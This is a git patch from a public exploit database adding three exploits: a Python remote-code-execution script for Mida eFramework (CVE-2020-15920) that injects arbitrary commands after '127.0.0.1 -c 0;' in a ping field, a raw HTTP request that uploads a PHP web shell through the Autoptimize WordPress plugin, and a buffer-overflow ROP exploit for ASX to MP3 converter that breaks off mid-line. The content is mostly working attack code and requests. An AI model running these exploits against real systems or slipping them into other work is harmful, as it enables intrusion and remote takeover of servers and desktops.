From 2621b3c52e731cdd893a526a7734fb28b1b52693 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Aug 2020 05:01:55 +0000 Subject: [PATCH] DB: 2020-08-28 3 changes to exploits/shellcodes ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC) Mida eFramework 2.9.0 - Remote Code Execution Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) --- exploits/multiple/webapps/48768.py | 72 ++++++++++++++++ exploits/php/webapps/48770.txt | 84 ++++++++++++++++++ exploits/windows/local/48769.py | 133 +++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 292 insertions(+) create mode 100755 exploits/multiple/webapps/48768.py create mode 100644 exploits/php/webapps/48770.txt create mode 100755 exploits/windows/local/48769.py diff --git a/exploits/multiple/webapps/48768.py b/exploits/multiple/webapps/48768.py new file mode 100755 index 000000000..84ed0200b --- /dev/null +++ b/exploits/multiple/webapps/48768.py @@ -0,0 +1,72 @@ +# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution +# Google Dork: Server: Mida eFramework +# Date: 2020-08-27 +# Exploit Author: elbae +# Vendor Homepage: https://www.midasolutions.com/ +# Software Link: http://ova-efw.midasolutions.com/ +# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html +# Version: <= 2.9.0 +# CVE : CVE-2020-15920 + + +#! /usr/bin/python3 +# -*- coding: utf-8 -*- + +import argparse +import requests +import subprocess +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +def print_disclaimer(): + print(""" + --------------------- + Disclaimer: + 1) For testing purpose only. + 2) Do not attack production environments. + 3) Intended for educational purposes only and cannot be used for law +violation or personal gain. + 4) The author is not responsible for any possible harm caused by this +material. + ---------------------""") + + +def print_info(): + print(""" +[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920) +[*] Reference: +https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html +[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability +(RCE) in PDC/ajaxreq.php + Version\t< 2.9.0\t./CVE-2020-15920 +http://192.168.1.60:8090/PDC/ajaxreq.php id + Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php +id """) + +def pwn(url,cmd): + running = """ +[*] Target URL: {0} +[*] Command: {1} + """ + print(running.format(url,cmd)) + data = { + "DIAGNOSIS":"PING", + "PARAM":"127.0.0.1 -c 0; {0}".format(cmd) + } + r = requests.post(url,data=data,verify=False) + line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]" + pretty_output = r.text.replace('
','\n') + print(line+"\n{0}\n".format(pretty_output)+line) + +def main(): + print_info() + print_disclaimer() + parser = argparse.ArgumentParser() + parser.add_argument("target", type=str, help="the complete target URL") + parser.add_argument("cmd", type=str, help="the command you want to run") + args = parser.parse_args() + pwn(args.target, args.cmd) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/48770.txt b/exploits/php/webapps/48770.txt new file mode 100644 index 000000000..677ed9fca --- /dev/null +++ b/exploits/php/webapps/48770.txt @@ -0,0 +1,84 @@ +# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) +# Date: 2020-08-24 +# Software Link: https://wordpress.org/plugins/autoptimize/ +# Author : SunCSR Team +# Version: v2.7.6 +# Tested on Ubuntu 18.04 / Kali Linux +# Reference: https://wpvulndb.com/vulnerabilities/10372 + +Description : +------------------------------------------------------------------- + +The ao_ccss_import AJAX call does not ensure that the file provided is a +legitimate Zip file, allowing high privilege users to upload arbitrary +files, such as PHP, leading to RCE. + +[POC] + +Step 1 : +POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 +Host: pwnme +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 +Firefox/80.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; +boundary=---------------------------26086940735210916964189813544 +Content-Length: 685 +Origin: http://pwnme +Connection: close +Cookie: autoptimize_feed=1; +wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd; +wordpress_test_cookie=WP+Cookie+check; +wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602; +wp-settings-time-1=1598516614 + + +-----------------------------404272946439029073744006559647 +Content-Disposition: form-data; name="file"; filename="shell.php" +Content-Type: application/zip + + +-----------------------------404272946439029073744006559647 +Content-Disposition: form-data; name="action" + +ao_ccss_import +-----------------------------404272946439029073744006559647 +Content-Disposition: form-data; name="ao_ccss_import_nonce" + +f25ca64f22 +-----------------------------404272946439029073744006559647-- + + +[Response] + +HTTP/1.1 200 OK +Server: nginx/1.14.0 (Ubuntu) +Date: Thu, 27 Aug 2020 08:21:08 GMT +Content-Type: text/html; charset=UTF-8 +Connection: close +Access-Control-Allow-Origin: http://pwnme.me +Access-Control-Allow-Credentials: true +X-Robots-Tag: noindex +X-Content-Type-Options: nosniff +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +X-Frame-Options: SAMEORIGIN +Referrer-Policy: strict-origin-when-cross-origin +Content-Length: 53 + +{"code":"200","msg":"Settings imported successfully"} + + +Step 2: Access to +http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php + + +Recommendations: Update to version 2.7.7 + + +Thank you very much! \ No newline at end of file diff --git a/exploits/windows/local/48769.py b/exploits/windows/local/48769.py new file mode 100755 index 000000000..81891e6ab --- /dev/null +++ b/exploits/windows/local/48769.py @@ -0,0 +1,133 @@ +# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) +# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-08-25 +# Vulnerable Software: ASX to MP3 converter +# Version: 3.1.3.7.2010.11.05 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +# Proof of Concept : + +# 1.- Run python code: asx_to_mp3_rop_exploit.py +# 2.- Works on DEP enabled for ASX2MP3Converter.exe +# 3.- Open "ASX2MP3Converter.exe" +# 4.- Click on "Load" Button +# 5.- Select generated file "asx_to_mp3_rop_exploit.wax". +# 6.- Click on "Open". +# 7.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "asx_to_mp3_rop_exploit.py" Code: + +import struct +file = 'asx_to_mp3_rop_exploit.wax' + + +payload = "http://" +payload += "A" * 17417 + struct.pack('